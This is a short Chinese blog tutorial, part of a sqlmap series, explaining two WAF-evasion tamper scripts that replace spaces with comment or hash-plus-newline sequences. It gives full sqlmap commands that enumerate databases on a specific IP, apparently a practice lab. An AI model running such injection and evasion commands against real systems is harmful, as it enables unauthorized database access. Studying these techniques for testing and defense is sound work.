sqlmap从入门到精通-第七章-7-19 绕过WAF脚本-space2morecomment.py&space2morehash.py

40. space2morecomment.py脚本

使用/**_**/替代空格 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2morecomment.py" --proxy="http://127.0.0.1:8080" -batch

是可以注入,看看burp的抓包情况

 发现确实是将空格转换为/**_**/

==================================================================================================================================================

41. space2morehash.py脚本

这个与space2hash.py类似,使用注释符#(%23) 再就是使用随机的字符串和一个换行符(%0A)来替换空格,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2morehash.py" --proxy="http://127.0.0.1:8080" -batch

 发现是可以注入的,burp抓包情况也是可以清楚的看到效果

迷茫的人生,需要不断努力,才能看清远方模糊的志向!
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/autopwn/p/13600216.html